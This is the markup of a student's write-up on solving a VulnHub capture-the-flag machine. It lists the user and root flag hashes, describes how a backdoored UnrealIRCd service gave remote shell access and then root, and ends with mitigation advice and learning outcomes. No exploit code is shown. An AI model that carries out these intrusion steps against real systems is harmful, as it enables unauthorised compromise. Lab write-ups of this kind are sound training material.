        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A69ED24" w14:textId="77777777" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00785791" w:rsidP="0078579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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00785791" w:rsidRPr="00785791" w14:paraId="1EAF3E3C" w14:textId="77777777" w:rsidTr="007857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3C21B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User Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A4A47BF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c53c08b5bf2b0801c5d0c24149826a6e</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00785791" w:rsidRPr="00785791" w14:paraId="48DBD083" w14:textId="77777777" w:rsidTr="007857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34117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kern w:val="0"/>
                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Root Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6614D928" w14:textId="77777777" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00785791" w:rsidP="0078579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</w:pPr>
            <w:r w:rsidRPr="00785791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 w:bidi="kn-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>ab28c8ca8da1b9ffc2d702ac54221105</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33DB0A88" w14:textId="43155AC0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752FCE2F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Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4605C58E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  <w:t>IRC Backdoor Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6678A263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 UnrealIRCd service was running a compromised version containing a backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFAACF2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  <w:t>Lack of Service Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C998DA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Critical services were exposed without proper patching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF9D457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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Weak Privilege Separation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A53CBE0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User was able to escalate privileges easily to root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC101AD" w14:textId="76A3ABB5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5FD42543" w14:textId="77777777" w:rsidR="00791A99" w:rsidRDefault="00791A99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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="466A379E" w14:textId="066EB2F5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lastRenderedPageBreak/>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E48635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These vulnerabilities allowed an attacker to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FD88FB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Exploit a backdoored service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Gain remote shell access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Escalate privileges to root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Fully compromise the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397CC40D" w14:textId="7FFF3CC8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0279E96A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Mitigation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC2DF3" w14:textId="306EB18A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• Update vulnerable services regularly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Avoid using backdoored or outdated software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Restrict unnecessary open ports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>• Implement proper access controls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br/>
        <w:t xml:space="preserve">• Monitor unusual service </w:t>
      </w:r>
      <w:r w:rsidR="00791A99"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actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7B7DB8" w14:textId="7DCBB293" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00785791" w:rsidP="0078579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</w:p>
    <w:p w14:paraId="6E9306C2" w14:textId="77777777" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00785791" w:rsidP="0078579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48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Learning Outcomes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197737B1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This challenge helped in understanding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA0347B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• Service enumeration and identification</w:t>
      </w:r>
      <w:r w:rsidRPr="00785791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Exploiting known backdoor vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00785791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Using Metasploit for exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="00785791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Gaining shell access via IRC service</w:t>
      </w:r>
      <w:r w:rsidRPr="00785791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br/>
        <w:t>• Privilege escalation techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560A087B" w14:textId="77777777" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00785791" w:rsidP="007857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</w:pP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 xml:space="preserve">This machine highlights how </w:t>
      </w:r>
      <w:r w:rsidRPr="00785791">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>outdated software can directly lead to full system compromise</w:t>
      </w:r>
      <w:r w:rsidRPr="00785791">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C2231B" w14:textId="12B4814E" w:rsidR="00B077AB" w:rsidRPr="00DA1C91" w:rsidRDefault="00B077AB" w:rsidP="00785791">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B077AB" w:rsidRPr="00DA1C91" w:rsidSect="008D6BB5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6AB48" w14:textId="77777777" w:rsidR="00804C9D" w:rsidRDefault="00804C9D" w:rsidP="006B74F2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="63DC7E1D" w14:textId="77777777" w:rsidR="00804C9D" w:rsidRDefault="00804C9D" w:rsidP="006B74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4BAD3" w14:textId="77777777" w:rsidR="00804C9D" w:rsidRDefault="00804C9D" w:rsidP="006B74F2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1EC31772" w14:textId="77777777" w:rsidR="00804C9D" w:rsidRDefault="00804C9D" w:rsidP="006B74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B7066"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9EA6E1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53B8A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C56C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F7913"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32B47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D7059"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C742D0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AF74C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5DAC2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32792F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C0307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6669F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A9E52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812A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17126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7C6860"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DADA9A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36166C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D15C4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65006F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AEAC94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E41E14"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26DA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D84FA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D47AF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B26046"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="663EF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5D6DB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9EFA6E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C21D1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6BFC1F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6327FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="412CAD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5B1D5D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4EF686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2F6D6E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB8881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A426AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="21B21C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BB1C80"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="397CA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601B8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B425D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A449F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F28477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176404"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8200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3B4D70"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2E467B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997172"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="859C14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890543"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7144CE4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517297"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AAEE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D8183B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76B2F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B164478"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC2ADF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5F6FFF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6C8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ED2026"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D74893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323DD8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="893C5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3A95327"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="851E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BE41A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBDE2A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6127D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F1AAAF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3D6A10"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77A8F9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93B81"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9468BC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28033F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E5078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A34EC7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF06E7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F13738"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BDC1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006408"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CA9AEA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3C4CE5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B14D5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10559"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95C895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A8273A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64C68D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1B111D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66FC3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227455"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7ED6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6734183">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1919703842">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="854657234">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="75059167">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1055350748">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1281497459">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="180512877">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1339381322">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1406992489">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1468862676">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1489515906">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1590626527">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1069304177">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="246619170">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="761687924">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1490438223">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="370887772">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="2098289267">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="992946472">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="440150709">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="737436382">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="339238045">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="127431437">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1361736950">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="577136631">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="391393925">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1420642320">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1185250454">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="36243098">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1215579138">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="541331620">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1291665567">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="58552583">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1680346185">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1861115741">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="593979621">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1059941029">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="276957576">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="555943615">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1338969666">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="657002878">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="530189751">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="99616231">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1906841283">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="229855601">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="548105877">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="84069782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8CA"/>
    <w:rsid w:val="00015FA0"/>
    <w:rsid w:val="00017F2D"/>
    <w:rsid w:val="00022BCE"/>
    <w:rsid w:val="00071B67"/>
    <w:rsid w:val="000A680C"/>
    <w:rsid w:val="000D332E"/>
    <w:rsid w:val="00130FA5"/>
    <w:rsid w:val="001968EA"/>
    <w:rsid w:val="001F4EFF"/>
    <w:rsid w:val="002478D9"/>
    <w:rsid w:val="0029654C"/>
    <w:rsid w:val="00477890"/>
    <w:rsid w:val="00521772"/>
    <w:rsid w:val="00582653"/>
    <w:rsid w:val="006B74F2"/>
    <w:rsid w:val="006F640F"/>
    <w:rsid w:val="00735062"/>
    <w:rsid w:val="00745351"/>
    <w:rsid w:val="00785791"/>
    <w:rsid w:val="00791A99"/>
    <w:rsid w:val="007E4FF6"/>
    <w:rsid w:val="00804C9D"/>
    <w:rsid w:val="00854119"/>
    <w:rsid w:val="00886AC1"/>
    <w:rsid w:val="008D6BB5"/>
    <w:rsid w:val="00961A2C"/>
    <w:rsid w:val="00B077AB"/>
    <w:rsid w:val="00B41E01"/>
    <w:rsid w:val="00B56205"/>
    <w:rsid w:val="00B80FCF"/>
    <w:rsid w:val="00B9321C"/>
    <w:rsid w:val="00BB170A"/>
    <w:rsid w:val="00BD621B"/>
    <w:rsid w:val="00C00870"/>
    <w:rsid w:val="00C3612F"/>
    <w:rsid w:val="00C4409C"/>
    <w:rsid w:val="00C57F5F"/>
    <w:rsid w:val="00C6792E"/>
    <w:rsid w:val="00C818CA"/>
    <w:rsid w:val="00CC5C4E"/>
    <w:rsid w:val="00CF232A"/>
    <w:rsid w:val="00DA1C91"/>
    <w:rsid w:val="00DF21FB"/>
    <w:rsid w:val="00DF5DC1"/>
    <w:rsid w:val="00E74AA9"/>
    <w:rsid w:val="00E92920"/>
    <w:rsid w:val="00EB19EB"/>
    <w:rsid w:val="00EB1C6E"/>
    <w:rsid w:val="00EF2672"/>
    <w:rsid w:val="00FB1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B633E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1D31A421-CDF1-4181-BFC2-B79D365CF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1B67"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00C81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8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8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8CA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D6BB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D6B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735062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735062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CC5C4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5C4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21772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6B74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4F2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006B74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4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2026-03-18T00:00:00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67A08B-8C17-43FE-BC1E-4AC77149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11</Pages>
  <Words>505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Challenge-08</vt:lpstr>
    </vt:vector>
  </TitlesOfParts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Challenge-09</dc:title>
  <dc:subject>Solving CTF Machines from VulnHub</dc:subject>
  <dc:creator>YUVARAJ M</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>yuvaraj m</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <cp:lastPrinted>2026-03-10T06:54:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-23T05:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-18T06:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>